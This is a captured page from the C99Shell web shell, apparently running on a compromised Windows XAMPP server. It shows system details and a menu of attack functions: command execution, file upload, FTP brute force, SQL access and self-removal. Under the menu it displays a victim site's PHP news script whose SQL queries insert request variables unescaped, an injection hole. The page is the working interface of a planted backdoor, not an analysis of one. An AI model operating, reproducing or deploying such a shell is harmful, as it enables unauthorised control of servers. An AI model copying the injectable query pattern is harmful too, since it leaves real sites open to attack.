!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\portel_dama\libreria\php\   drwxrwxrwx
Free 7.27 GB of 239.26 GB (3.04%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     noticia_1_2.php (3.59 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
    
if (isset($d) and isset($m) and isset($y)) 
    {
        
$fecha $y "-" $m "-" $d " 00:00:00";    
    }else{    
        
$f = new fecha;
        
$f->sys_fecha();
        
$fecha $f->FECHA_SYS;
    }
    
// echo $fecha;
    
$cuando "(( contenido_pertenencia_categoria_links.categoria_tema_id = '$patron' and contenido_pertenencia_categoria_links.links_id = contenido_links.links_id )
    and (( contenido_links.links_fecha_publicacion <= '
$fecha' and contenido_links.links_fecha_retiro >= '$fecha' ) or ( contenido_links.links_fecha_retiro = '0000-00-00 00:00:00')) and ( contenido_links.links_tipo_id = 1 ) and ( contenido_links.links_estado = 0 )) 
    order by contenido_links.links_id DESC"
;
    
    
$control = new select_pg(2"contenido_links.links_nombre, contenido_links.links_descripcion, contenido_links.links_texto, contenido_links.links_id, contenido_links.links_foro, contenido_links.links_link""contenido_links, contenido_pertenencia_categoria_links"$cuando64"(nombre)-(descripcion)-(texto)-(id)""<p><font size=\"4\"><a href=\"frame_detalle_2.php?h_id=(id)\"><b>(nombre)</b></a></font></p>"$name_page ,$inicio); 
    
$descripcion $control->RESULTADOS[0][1];
    
$texto $control->RESULTADOS[0][2];
    
    
$texto str_replace("[salto]","",$texto);
    echo 
"<p>"$texto "</p>";
    
//echo mb_detect_encoding($texto);
    
    
if ($control->RESULTADOS[0][5] != "" and $control->RESULTADOS[0][5] != "#") {
        echo 
"<p><a href=\"../" .  $control->RESULTADOS[0][5] . "\">Ver más información adicional ó documentos</a></p>";
    }
    
    if (
$control->RESULTADOS[0][4] == 1) {
    
?>
    
<table width="100%" border="0" cellspacing="0" cellpadding="8">
  <tr> 
    <td bgcolor="#CCCCCC"><div><strong>Opine sobre: <?php echo $control->RESULTADOS[0][0]; ?></strong></div></td>
  </tr>
  <tr> 
    <td><form name="form1" method="post" action="<?php echo $name_page?>">
        <table width="100%" border="0" cellspacing="0" cellpadding="4">
          <tr> 
            <td width="50%"><p>Alias: 
              <input name="foro_nombre_usuario" type="text" id="foro_nombre_usuario"></p></td>
            <td width="50%"><p>T&igrave;tulo Comentario: <input name="foro_comentario_titulo" type="text" id="foro_comentario_titulo"></p></td>
          </tr>
          <tr> 
            <td width="50%" align="right"><p>Comentario:</p></td>
            <td width="50%" rowspan="2"><textarea name="foro_comentario_texto" id="foro_comentario_texto"></textarea></td>
          </tr>
          <tr> 
            <td width="50%">&nbsp;</td>
          </tr>
          <tr align="center"> 
            <td colspan="2"> <input type="submit" name="Submit" value="Enviar mi comentario"> 
              <input name="id_app" type="hidden" id="id_app" value="33"> <input name="accion" type="hidden" id="accion" value="ins_"> 
              <input name="foro_fecha_comentario" type="hidden" id="fecha" value="<?php echo $fecha?>"> 
              <input name="patron" type="hidden" id="patron" value="<?php echo $patron?>"> 
              <input name="foro_links_id" type="hidden" id="foro_id" value="<?php echo $control->RESULTADOS[0][3]; ?>"></td>
          </tr>
        </table>
      </form></td>
  </tr>
  <tr> 
    <td>
      <?php     $cuando "links_id =" $control->RESULTADOS[0][3] . " order by foro_fecha_comentario DESC";
    
    
$control = new select_pg(3"foro_nombre_usuario, foro_comentario_texto, foro_fecha_comentario, foro_comentario_titulo""formas_foro"$cuando44"(usuario)-(texto)-(fecha)-(titulo)""<p><small>(fecha)</small><br><font size=\"2\"><b>(titulo)</b></font> (usuario)<br>(texto)</p>""" ,""); ?>
    </td>
  </tr>
</table>
    <?php ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--